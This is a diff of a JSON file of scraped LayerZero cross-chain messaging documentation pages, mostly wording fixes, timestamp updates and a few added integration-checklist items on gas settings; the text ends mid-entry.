Default Oracle Updates Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1170,7 +1170,7 @@ { "title": "Relayer", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer", - "body": "Relayer Relayers perform a critical role in the LayerZero message protocol by delivering messages. Relayers work in tandem with an Oracle to transmit messages between chains. By default, User Applications will use the LayerZero Relayer. This means you do not need to run your own Relayer. If you want to select a custom Relayer you will need to set a custom UA configuration . If you wish to learn more about operating and/or building your own Relayer read on. Aptos Guide - Previous UA Custom Configuration Next Overview Last modified 16d ago", + "body": "Relayer Relayers perform a critical role in the LayerZero message protocol by delivering messages. Relayers work in tandem with an Oracle to transmit messages between chains. By default, User Applications will use the LayerZero Relayer. This means you do not need to run your own Relayer. If you want to select a custom Relayer you will need to set a custom UA configuration . If you wish to learn more about operating and/or building your own Relayer read on. Aptos Guide - Previous UA Custom Configuration Next Overview Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1178,7 +1178,7 @@ { "title": "Advanced", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced", - "body": "Advanced Looking to set your UA configuration ? Check here to set a custom blockConfirmations and other UA app config values. Previous Set Trusted Remotes Next Development Staging Last modified 1yr ago", + "body": "Advanced Looking to set your UA configuration ? Check here to set a custom blockConfirmations and other UA app config values. 
Previous Set Trusted Remotes Next Development Staging Last modified 1d ago", "labels": [ "Documentation" ] @@ -1186,7 +1186,7 @@ { "title": "Best Practice", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/best-practice", - "body": "Best Practice It is highly recommended User Applications implement the ILayerZeroApplicationConfig . Implementing this interface will provide you with forceResumeReceive which, in the worse case can allow the owner/multisig to unblock the queue of messages if something unexpected happens. Instant Finality Guarantee (IFG) Reverting in UA is cumbersome and expensive. It is more efficient to design your UA with IFG such that if a transaction was accepted at source, the transaction will be accepted at the remote. For example, Stargate has a credit management system (Delta Algorithm) to guarantee that if a swap was accepted at source, the destination must have enough asset to complete the swap, hence the IFG. Tracking the Nonce It is important for UA to keep track of their own nonce (e.g. by events) to correlate the send and receive side transactions. UA at send() side can query the nonce at endpoint.getOutboundNonce interface, and in lzReceive() the inboundNonce is in the arguments. One Action Per Message Try to do only one thing per message. The implication is that if the message was burnt (misconfiguration, bad code etc.. the damage to the state is minimal. Store Failed Messages If the message execution fails at the destination, try-catch, and store it for future retry. From LayerZero's perspective, the message has been delivered. It is much cheaper and easier for your programs to recover from the last state at the destination chain. Store a hash of the message payload is much cheaper than storing the whole message. Gas for Message Types If your app includes multiple message types to be sent across chains, compute a rough gas estimate at the destination chain per each message type . Your message may fail for the out-of-gas exception at the destination if your app did not instruct the relayer to put extra gas on contract execution. And the UA should enforce the gas estimate on-chain at the source chain to prevent users from inputting too low the value for gas. Address Sanity Check Check the address size according to the source chain (e.g. address size == 20 bytes on EVM chains) to prevent a vector unauthenticated contract call. Messages Encoding Use type-safe bytes codec. Use custom codec only if you are comfortable with it and your app requires deep optimization. Previous Failure Revert Messages Next - EVM Guides LayerZero Omnichain Contracts Last modified 1yr ago", + "body": "Best Practice It is highly recommended User Applications implement the ILayerZeroApplicationConfig . Implementing this interface will provide you with forceResumeReceive which, in the worst case, can allow the owner/multisig to unblock the queue of messages if something unexpected happens. Instant Finality Guarantee (IFG) Reverting in UA is cumbersome and expensive. It is more efficient to design your UA with IFG such that if a transaction was accepted at source, the transaction will be accepted at the remote. For example, Stargate has a credit management system (Delta Algorithm) to guarantee that if a swap was accepted at source, the destination must have enough asset to complete the swap, hence the IFG. Tracking the Nonce It is important for UA to keep track of their own nonce (e.g. by events) to correlate the send and receive side transactions.
UA at send() side can query the nonce at the endpoint.getOutboundNonce interface, and in lzReceive() the inboundNonce is in the arguments. One Action Per Message Try to do only one thing per message. The implication is that if the message was burnt (misconfiguration, bad code, etc.), the damage to the state is minimal. Store Failed Messages If the message execution fails at the destination, use try/catch, and store it for future retry. From LayerZero's perspective, the message has been delivered. It is much cheaper and easier for your programs to recover from the last state at the destination chain. Storing a hash of the message payload is much cheaper than storing the whole message. Gas for Message Types If your app includes multiple message types to be sent across chains, compute a rough gas estimate at the destination chain per each message type . Your message may fail for the out-of-gas exception at the destination if your app did not instruct the relayer to put extra gas on contract execution. The UA should also enforce the gas estimate on-chain at the source chain to prevent users from supplying too low a value for gas. Address Sanity Check Check the address size according to the source chain (e.g. address size == 20 bytes on EVM chains) to prevent an unauthenticated contract call attack vector. Messages Encoding Use type-safe bytes codec. Use custom codec only if you are comfortable with it and your app requires deep optimization. Previous Failure Revert Messages Next - EVM Guides LayerZero Omnichain Contracts Last modified 21d ago", "labels": [ "Documentation" ] @@ -1194,7 +1194,7 @@ { "title": "Code Examples", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples", - "body": "Code Examples Take a look at our Solidity Examples repo or some great template code to get you started It is recommended User Applications implement NonblockingLzApp which allow you to easily override two functions to add send + receive functionality to your contracts! GitHub - LayerZero-Labs/solidity-examples: example contracts GitHub LayerZero Solidity Examples npm: @layerzerolabs/solidity-examples npm NPM package to go along with Solidity Examples The primary way to implement LayerZero messaging in your contract is to use LzApp or NonblockingLzApp: solidity-examples/contracts/lzApp at main LayerZero-Labs/solidity-examples GitHub There are implementations of Tokens (OFT) and NFTs (ONFT) as well: solidity-examples/contracts/examples at main LayerZero-Labs/solidity-examples GitHub Previous UA Configuration Lock Next OmniCounter.sol Last modified 3mo ago", + "body": "Code Examples Take a look at our Solidity Examples repo or some great template code to get you started. It is recommended User Applications implement NonblockingLzApp which allows you to easily override two functions to add send + receive functionality to your contracts!
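The "store failed messages" advice above lends itself to a short sketch. This is Python pseudocode of the pattern, similar in spirit to the failedMessages bookkeeping in the solidity-examples NonblockingLzApp, not LayerZero's actual implementation; `keccak` below is a stand-in built on SHA3, since the real on-chain hash would be keccak256.

```python
import hashlib

def keccak(data: bytes) -> bytes:
    # Stand-in for Solidity's keccak256 (hashlib ships SHA3, not Keccak).
    return hashlib.sha3_256(data).digest()

failed_messages = {}  # (src_chain_id, src_address, nonce) -> payload hash

def on_failed_receive(src_chain_id, src_address, nonce, payload):
    # Store only the hash: much cheaper than storing the whole message.
    failed_messages[(src_chain_id, src_address, nonce)] = keccak(payload)

def retry(src_chain_id, src_address, nonce, payload):
    key = (src_chain_id, src_address, nonce)
    assert failed_messages.get(key) == keccak(payload), "no such failed message"
    del failed_messages[key]
    # ... re-run the application logic with `payload` ...

on_failed_receive(101, b"\x11" * 20, 7, b"hello")
retry(101, b"\x11" * 20, 7, b"hello")
```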
GitHub - LayerZero-Labs/solidity-examples: example contracts GitHub LayerZero Solidity Examples npm: @layerzerolabs/solidity-examples npm NPM package to go along with Solidity Examples The primary way to implement LayerZero messaging in your contract is to use LzApp or NonblockingLzApp: solidity-examples/contracts/lzApp at main LayerZero-Labs/solidity-examples GitHub There are implementations of Tokens (OFT) and NFTs (ONFT) as well: solidity-examples/contracts/examples at main LayerZero-Labs/solidity-examples GitHub Previous UA Configuration Lock Next OmniCounter.sol Last modified 15d ago", "labels": [ "Documentation" ] @@ -1202,15 +1202,7 @@ { "title": "Error Messages", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages", - "body": "Error Messages The most common problem: Not sending msg.value when calling send() on the endpoint. See notes here. See here for how much msg.value to send to cover the message cost. Is your transaction failing on destination with an unhelpful messages like this: ? Make sure you are sending the message to a destination contract that exists! If you've experimented with custom configuration, review the docs here For a description of every possible onchain failure take a look at this page . Previous ILayerZeroRelayer.sol Next StoredPayload Last modified 1yr ago", - "labels": [ - "Documentation" - ] - }, - { - "title": "Interfaces", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces", - "body": "Interfaces Interfaces to the LayerZero contracts Interfaces for interacting with LayerZero contracts, including the Endpoint . Previous PingPong.sol Next EVM (Solidity) Interfaces Last modified 1yr ago", + "body": "Error Messages The most common problem: Not sending msg.value when calling send() on the endpoint. See notes here. See here for how much msg.value to send to cover the message cost. Is your transaction failing on the destination with an unhelpful message? Make sure you are sending the message to a destination contract that exists! If you've experimented with custom configuration, review the docs here For a description of every possible onchain failure take a look at this page . Previous PingPong.sol Next StoredPayload Last modified 21d ago", "labels": [ "Documentation" ] @@ -1218,7 +1210,7 @@ { "title": "LayerZero Integration Checklist", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-integration-checklist", - "body": "LayerZero Integration Checklist The checklist below is intended to help prepare a project that integrates LayerZero for an external audit or Mainnet deployment Use the latest version of solidity-examples package. Do not copy contracts from LayerZero repositories directly to your project. If your project requires token bridging inherit your token from OFT or ONFT . For new tokens use OFT or ONFT , for bridging existing tokens use ProxyOFT or ProxyONFT . For bridging only between EVM chains use OFT and for bridging between EVM and non EVM chains (e.g., Aptos) use OFTV2 . Do not hardcode LayerZero chain Ids. Use admin restricted setters instead. Do not hardcode address zero ( address(0) ) as zroPaymentAddress when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode useZro to false when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode zero bytes ( bytes(0) ) as adapterParamers . Pass them as a parameter instead. Make sure to test the amount of gas required for the execution on the destination.
Use custom adapter parameters and specify minimum destination gas for each cross-chain path when the default amount of gas ( 200,000 ) is not enough. This requires whoever calls the send function to provide the adapter params with a destination gas >= amount set in the minDstGasLookup for that chain. So that your users don't run into failed messages on the destination. It makes it a smoother end-to-end experience for all. Do not add requires statements that repeat existing checks in the parent contracts. For example, lzReceive function in LzApp contract checks that the message sender is LayerZero endpoint and the scrAddress is a trusted remote, do not perform the same checks in nonblockingLzReceive . If your contract derives from LzApp , do not call lzEndpoint.send directly, use _lzSend . For ONFTs that allow minting a range of tokens on each chain, make the variables that specify the range (e.g. startMintId and endMintId) immutable. Previous 1155 Next - EVM Guides LayerZero Tooling Last modified 7mo ago", + "body": "LayerZero Integration Checklist The checklist below is intended to help prepare a project that integrates LayerZero for an external audit or Mainnet deployment Use the latest version of the solidity-examples package. Do not copy contracts from LayerZero repositories directly to your project. If your project requires token bridging, inherit your token from OFT or ONFT . For new tokens, use OFT or ONFT ; for bridging existing tokens, use ProxyOFT or ProxyONFT . For bridging only between EVM chains, use OFT ; for bridging between EVM and non-EVM chains (e.g., Aptos), use OFTV2 . Do not hardcode LayerZero chain Ids. Use admin-restricted setters instead. Do not hardcode address zero ( address(0) ) as zroPaymentAddress when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode useZro to false when estimating fees and sending messages. Pass it as a parameter instead. Do not hardcode zero bytes ( bytes(0) ) as adapterParams . Pass them as a parameter instead. Set setUseCustomAdapterParams to true for OFT and ONFT . Test the amount of gas required for the execution on the destination chain. Use custom adapter parameters and specify the minimum destination gas for each cross-chain path when the default amount of gas ( 200,000 ) is not enough. Call setMinDstGas to set the minimum gas. (200k is enough for OFT on all EVM chains except Arbitrum; for Arbitrum, set it to 2M.) This requires whoever calls the send function to provide the adapter params with a destination gas >= the amount set in the minDstGasLookup for that chain, so that your users don't run into failed messages on the destination. This makes for a smoother end-to-end experience for all. Do not add require statements that repeat existing checks in the parent contracts. For example, the lzReceive function in the LzApp contract checks that the message sender is the LayerZero endpoint and the srcAddress is a trusted remote; do not perform the same checks in nonblockingLzReceive . If your contract derives from LzApp , do not call lzEndpoint.send directly, use _lzSend . For ONFTs that allow minting a range of tokens on each chain, make the variables that specify the range (e.g. startMintId and endMintId) immutable.
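A small Python sketch of the gas guidance in the checklist above. This is a hedged illustration, not LayerZero's implementation: it assumes the type-1 adapterParams layout used by LayerZero V1 (a packed uint16 version followed by a uint256 destination gas), and the `MIN_DST_GAS` table here is illustrative, mirroring the values from the text (200k for most EVM chains, 2M for Arbitrum).

```python
def encode_adapter_params_v1(dst_gas: int) -> bytes:
    # uint16 version (=1) followed by uint256 destination gas, tightly packed.
    return (1).to_bytes(2, "big") + dst_gas.to_bytes(32, "big")

def decode_dst_gas(adapter_params: bytes) -> int:
    assert int.from_bytes(adapter_params[:2], "big") == 1, "type-1 params only"
    return int.from_bytes(adapter_params[2:34], "big")

MIN_DST_GAS = {"generic-evm": 200_000, "arbitrum": 2_000_000}  # values from the text

def check_send(dst_chain: str, adapter_params: bytes) -> None:
    # Mirrors the minDstGasLookup check: reject sends carrying too little gas.
    if decode_dst_gas(adapter_params) < MIN_DST_GAS[dst_chain]:
        raise ValueError("destination gas below the configured minimum")

check_send("arbitrum", encode_adapter_params_v1(2_000_000))  # passes
```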
Previous 1155 Next - EVM Guides LayerZero Tooling Last modified 20h ago", "labels": [ "Documentation" ] @@ -1226,7 +1218,7 @@ { "title": "LayerZero Omnichain Contracts", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts", - "body": "LayerZero Omnichain Contracts Want to send your tokens cross chain? OFT Omnichain Fungible Tokens enable a token to be sent across current (and even future) chains! There is no requirement for liquidity, and there are no fees! ONFT Omnichain Non Fungible Tokens allow your NFT project to send tokens across chains. See the Lil Pudgies bridge in action! EVM Guides - Previous Best Practice Next OFT Last modified 7mo ago", + "body": "LayerZero Omnichain Contracts Want to send your tokens cross chain? OFT Omnichain Fungible Tokens enable a token to be sent across current (and even future) chains! There is no requirement for liquidity, and there are no fees! ONFT Omnichain Non Fungible Tokens allow your NFT project to send tokens across chains. See the Lil Pudgies bridge in action! EVM Guides - Previous Best Practice Next OFT Last modified 5d ago", "labels": [ "Documentation" ] @@ -1234,7 +1226,7 @@ { "title": "LayerZero Tooling", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-tooling", - "body": "LayerZero Tooling Configuration tools around setting up your UA Config and Wire Up Config A set of common tasks for contracts integrating LayerZero Installation $ npm install @layerzerolabs/ua-utils The plugin depends on @nomiclabs/hardhat-ethers , so you need to import both plugins in your hardhat.config.js : require ( \"@nomiclabs/hardhat-ethers\" ); require ( \"@layerzerolabs/ua-utils\" ); Or if you are using TypeScript, in your hardhat.config.ts : import \"@nomiclabs/hardhat-ethers\" ; import \"@layerzerolabs/ua-utils\" ; UA Config This config is used to Lock in UA Configuration . To use this script please fill in your Application Configuration according to your applications needs. Wire Up Configuration This config can be used to set the following on your UA contract: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) To use this script please fill in your Wire Up Configuration according to your applications needs. EVM Guides - Previous LayerZero Integration Checklist Next UA Configuration Last modified 3mo ago", + "body": "LayerZero Tooling Configuration tools around setting up your UA Config and Wire Up Config A set of common tasks for contracts integrating LayerZero Installation $ npm install @layerzerolabs/ua-utils The plugin depends on @nomiclabs/hardhat-ethers , so you need to import both plugins in your hardhat.config.js : require ( \"@nomiclabs/hardhat-ethers\" ); require ( \"@layerzerolabs/ua-utils\" ); Or if you are using TypeScript, in your hardhat.config.ts : import \"@nomiclabs/hardhat-ethers\" ; import \"@layerzerolabs/ua-utils\" ; UA Config This config is used to Lock in UA Configuration . To use this script please fill in your Application Configuration according to your applications needs. 
Wire Up Configuration This config can be used to set the following on your UA contract: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) To use this script please fill in your Wire Up Configuration according to your application's needs. EVM Guides - Previous LayerZero Integration Checklist Next UA Configuration Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1242,7 +1234,7 @@ { "title": "Getting Started", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master", - "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the send() and lzReceive() interfaces and your app is ready to send messages across connected chains. To get started, check send() and lzReceive() . Or dive right in with a simple code example here . FAQ Learn the answers to Frequently Asked Questions . User Applications User Application contracts built on LayerZero send secure messages between different blockchains! Here is an example of an OmnichainFungibleToken (OFT) Talk to the Team Twitter Telegram Discord (join dev-announcements for updates!) Medium Official Website https://layerzero.network/ Concepts - Previous FAQ Next Send Messages Last modified 10mo ago", + "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the send() and lzReceive() interfaces and your app is ready to send messages across connected chains. To get started, check send() and lzReceive() . Or dive right in with a simple code example here . FAQ Learn the answers to Frequently Asked Questions . User Applications User Application contracts built on LayerZero send secure messages between different blockchains! Here is an example of an OmnichainFungibleToken (OFT) Talk to the Team Twitter Telegram Discord (join dev-announcements for updates!) Medium Official Website https://layerzero.network/ Concepts - Previous FAQ Next Send Messages Last modified 1yr ago", "labels": [ "Documentation" ] @@ -1250,7 +1242,7 @@ { "title": "Omnichain Governance", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/omnichain-governance", - "body": "Omnichain Governance LayerZero enables multichain governance solutions. All votes. All chains. Recently, the team produced contracts for omnichain governance for Uniswap . Take a look! GitHub - LayerZero-Labs/omnichain-governance-executor GitHub Previous Wire Up Configuration Next - Aptos Guide Getting Started Last modified 3mo ago", + "body": "Omnichain Governance LayerZero enables multichain governance solutions. All votes. All chains. Recently, the team produced contracts for omnichain governance for Uniswap . Take a look! GitHub - LayerZero-Labs/omnichain-governance-executor GitHub Previous Wire Up Configuration Next - Aptos Guide Getting Started Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1258,7 +1250,7 @@ { "title": "UA Custom Configuration", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/ua-custom-configuration", - "body": "UA Custom Configuration User Application contracts may set their own configuration for block confirmation, send version, relayer, oracle, etc. When a UA wishes to configure their own block confirmations both the outboundBlockConfirmations of the source and the inboundBlockConfirmations of the destination must be configured and match. 
How to Configure A User Application (UA) can use non-default protocol settings, and to do so it must implement the interface ILayerZeroUserApplicationConfig . The UA may then manually update its ApplicationConfig . See examples below as well as the CONFIG_TYPES . Set: Inbound Proof Library 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ inboundProofLibraryVersion ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION , 9 config 10 ) Set: Inbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 42 ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Relayer 1 let config = ethers . utils . solidityPack ( 2 [ \"address\" ], 3 [ relayerAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_RELAYER , 9 config 10 ) Set: Outbound Proof Type/LibraryVersion 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ outboundProofType ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_PROOF_TYPE , 9 config 10 ) Set: Outbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 17 ] // outbound block confirmations 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Oracle Oracle settings are configured per channel pathway, meaning UAs who want to lock Oracle configs will need to call setConfig per chain pairing. 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"address\" ], 3 [ oracleAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_ORACLE , 9 config 10 ) Config Types CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION 1 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS 2 CONFIG_TYPE_RELAYER 3 CONFIG_TYPE_OUTBOUND_PROOF_TYPE 4 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS 5 CONFIG_TYPE_ORACLE 6 Previous NonblockingLzApp Next UA Configuration Lock Last modified 10d ago", + "body": "UA Custom Configuration User Application contracts may set their own configuration for block confirmation, send version, relayer, oracle, etc. When a UA wishes to configure their own block confirmations both the outboundBlockConfirmations of the source and the inboundBlockConfirmations of the destination must be configured and match. How to Configure A User Application (UA) can use non-default protocol settings, and to do so it must implement the interface ILayerZeroUserApplicationConfig . The UA may then manually update its ApplicationConfig . See examples below as well as the CONFIG_TYPES . Set: Inbound Proof Library 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ inboundProofLibraryVersion ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION , 9 config 10 ) Set: Inbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 42 ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Relayer 1 let config = ethers . utils . solidityPack ( 2 [ \"address\" ], 3 [ relayerAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_RELAYER , 9 config 10 ) Set: Outbound Proof Type/LibraryVersion 1 let config = ethers . utils . defaultAbiCoder . 
encode ( 2 [ \"uint16\" ], 3 [ outboundProofType ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_PROOF_TYPE , 9 config 10 ) Set: Outbound Block Confirmations 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"uint16\" ], 3 [ 17 ] // outbound block confirmations 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS , 9 config 10 ) Set: Oracle Oracle settings are configured per channel pathway, meaning UAs who want to lock Oracle configs will need to call setConfig per chain pairing. 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"address\" ], 3 [ oracleAddr ] 4 ) 5 await lzEndpoint . setConfig ( 6 0 , 7 dstChainId , 8 CONFIG_TYPE_ORACLE , 9 config 10 ) Config Types CONFIG_TYPE_INBOUND_PROOF_LIBRARY_VERSION 1 CONFIG_TYPE_INBOUND_BLOCK_CONFIRMATIONS 2 CONFIG_TYPE_RELAYER 3 CONFIG_TYPE_OUTBOUND_PROOF_TYPE 4 CONFIG_TYPE_OUTBOUND_BLOCK_CONFIRMATIONS 5 CONFIG_TYPE_ORACLE 6 Previous NonblockingLzApp Next UA Configuration Lock Last modified 6d ago", "labels": [ "Documentation" ] @@ -1266,7 +1258,7 @@ { "title": "FAQ", "html_url": "https://layerzero.gitbook.io/docs/faq/faq-1", - "body": "FAQ Frequently Asked Questions What is LayerZero? LayerZero enables messages to be sent between blockchains. How do I send a cross-chain message? See example contracts here and details on sending messages here . What blockchains are supported? See a table of supported blockchains . The team is always working to add more chains, so check back frequently! What is a User Application? A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. What is an Endpoint? The deployed contract on which your User Application calls send() to transmit messages and set its own UA configuration. Heres is the list of endpoint addresses with which you may interact with. What is an Ultra Light Node? The UltraLightNode.sol is a smart contract at the heart of the message protocol, sitting behind the Endpoint, it enables all the features of LayerZero. In the future, UAs will benefit from new versions of the Ultra Light Node, the most recent version of the ULN is v2. What is an Oracle? An Oracle is required by each User Application and assists in sending messages. User Applications use the default Oracle automatically so you don't need you configure it, but you can if you want to. What is a Relayer? User Applications use the LayerZero Relayer by default, without additional configuration. However, a Relayer is required by each User Application and plays a crucial role in delivering cross chain messages. If desirable, User Applications may be configured to use a different relayer. Technical Section Two Modes: Blocking and Nonblocking: LayerZero UserApplications can choose to be Blocking or Nonblocking (see the examples ). All messages are nonce-ordered, which means they will arrive from a source chain & source UA address in the order they are sent. By default, messages will be queued if there is an out-of-gas, or logical error on the destination. If contract developers wish to avoid the default blocking mechanism, instead use NonblockingLzApp which will continue with the flow of messages, a design which stores out-of-gas messages on the destination to be retried (by anyone) at anytime. Can LayerZero users enjoy the benefit of any future optimized proof technology, e.g. ZKP based? Yes, LayerZero has the ability to add new Messaging Libraries. 
LayerZero Labs will keep bringing the best research into production. Existing users can easily perform a library migration on-chain. Concepts - Previous Glossary Next - EVM Guides Getting Started Last modified 3mo ago", + "body": "FAQ Frequently Asked Questions What is LayerZero? LayerZero enables messages to be sent between blockchains. How do I send a cross-chain message? See example contracts here and details on sending messages here . What blockchains are supported? See a table of supported blockchains . The team is always working to add more chains, so check back frequently! What is a User Application? A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. What is an Endpoint? The deployed contract on which your User Application calls send() to transmit messages and set its own UA configuration. Here is the list of endpoint addresses with which you may interact. What is an Ultra Light Node? The UltraLightNode.sol is a smart contract at the heart of the message protocol; sitting behind the Endpoint, it enables all the features of LayerZero. In the future, UAs will benefit from new versions of the Ultra Light Node; the most recent version of the ULN is v2. What is an Oracle? An Oracle is required by each User Application and assists in sending messages. User Applications use the default Oracle automatically so you don't need to configure it, but you can if you want to. What is a Relayer? User Applications use the LayerZero Relayer by default, without additional configuration. However, a Relayer is required by each User Application and plays a crucial role in delivering cross chain messages. If desirable, User Applications may be configured to use a different relayer. Technical Section Two Modes: Blocking and Nonblocking: LayerZero UserApplications can choose to be Blocking or Nonblocking (see the examples ). All messages are nonce-ordered, which means they will arrive from a source chain & source UA address in the order they are sent. By default, messages will be queued if there is an out-of-gas or logical error on the destination. If contract developers wish to avoid the default blocking mechanism, they can instead use NonblockingLzApp , which will continue with the flow of messages, a design which stores out-of-gas messages on the destination to be retried (by anyone) at any time. Can LayerZero users enjoy the benefit of any future optimized proof technology, e.g. ZKP based? Yes, LayerZero has the ability to add new Messaging Libraries. LayerZero Labs will keep bringing the best research into production. Existing users can easily perform a library migration on-chain. Concepts - Previous Glossary Next - EVM Guides Getting Started Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1274,7 +1266,7 @@ { "title": "Future-Proof Architecture", "html_url": "https://layerzero.gitbook.io/docs/faq/future-proof-architecture", - "body": "Future-Proof Architecture Immutable Endpoint LayerZero Endpoint is the only interface for a User Application (UA). The Endpoint allows UAs to configure the Messaging Library used for sending and receiving verified messages, and guarantees message delivery ordering across all messaging libraries. Send() : the message will be sent through the endpoint first and then redirected to the UA-configured Messaging Library Receive() : the message will be verified at the Messaging Library first then forwarded to the endpoint and eventually delivered to the UA. 
Perpetual Messaging All Messaging Libraries, once deployed, will be in service in perpetuity, which means that no entity, including the LayerZero Labs multi-sig, can de-register any Messaging Library or change the Messaging Library configuration of a UA, i.e. if the UA has specified a Messaging Library to use, no entity can stop the messaging flow. Continuous Improvement LayerZero can deploy new Messaging Libraries for security and performance optimization (e.g. more efficient proof technologies). This allows LayerZero to bring the best research into production and support the system with the best technology. The UA interface won't change and UAs can simply migrate to any new version with ease. For each Messaging Library (e.g. Ultra-Light Node), LayerZero can deploy new proof validation libraries for security or performance reasons. Immutable UA Configuration If the UA has specified a validation library to use, no entity can change the configuration. Concepts - Previous LayerZero Endpoint Next - Concepts Glossary Last modified 3mo ago", + "body": "Future-Proof Architecture Immutable Endpoint LayerZero Endpoint is the only interface for a User Application (UA). The Endpoint allows UAs to configure the Messaging Library used for sending and receiving verified messages, and guarantees message delivery ordering across all messaging libraries. Send() : the message will be sent through the endpoint first and then redirected to the UA-configured Messaging Library Receive() : the message will be verified at the Messaging Library first then forwarded to the endpoint and eventually delivered to the UA. Perpetual Messaging All Messaging Libraries, once deployed, will be in service in perpetuity, which means that no entity, including the LayerZero Labs multi-sig, can de-register any Messaging Library or change the Messaging Library configuration of a UA, i.e. if the UA has specified a Messaging Library to use, no entity can stop the messaging flow. Continuous Improvement LayerZero can deploy new Messaging Libraries for security and performance optimization (e.g. more efficient proof technologies). This allows LayerZero to bring the best research into production and support the system with the best technology. The UA interface won't change and UAs can simply migrate to any new version with ease. For each Messaging Library (e.g. Ultra-Light Node), LayerZero can deploy new proof validation libraries for security or performance reasons. Immutable UA Configuration If the UA has specified a validation library to use, no entity can change the configuration. Concepts - Previous LayerZero Endpoint Next - Concepts Glossary Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1282,7 +1274,7 @@ { "title": "Glossary", "html_url": "https://layerzero.gitbook.io/docs/faq/glossary", - "body": "Glossary This glossary defines and explains many LayerZero concepts and terminology. User Application (UA) A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. We define UA as a tuple ( chainId , contractAddress ) the UA that send() the message at the source chain as srcUA ( srcChain , srcAddress ) the UA that lzReceive() at the destination chain as dstUA ( dstChain , dstAddress ) In LayerZero's perspective, srcUA and dstUA are different, though they might be the same entity. 
Ultra-Light Node (ULN) ULN is a messaging protocol, firstly introduced in the LayerZero white paper, that allows lightweight cross-chain messaging with configurable trustlessness on the specification of Oracle and Relayer, the two roles that are relaying block information and transaction proof across chains. Oracle A contract address that can be notified to move a block header. What is a Relayer? Any process that delivers a transaction proof in the LayerZero system. Messaging Library The contract that handles the message payload packing on the source chain and verification on the destination chain. Ultra-Light Node is an implementation of Messaging Library Proof Library The contract that verifies the validity of a proof. Merkle Patricia Tree inclusion proof is an implementation of Proof Library. Concepts - Previous Future-Proof Architecture Next - Concepts FAQ Last modified 2mo ago", + "body": "Glossary This glossary defines and explains many LayerZero concepts and terminology. User Application (UA) A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. We define UA as a tuple ( chainId , contractAddress ) the UA that send() the message at the source chain as srcUA ( srcChain , srcAddress ) the UA that lzReceive() at the destination chain as dstUA ( dstChain , dstAddress ) In LayerZero's perspective, srcUA and dstUA are different, though they might be the same entity. Ultra-Light Node (ULN) ULN is a messaging protocol, firstly introduced in the LayerZero white paper, that allows lightweight cross-chain messaging with configurable 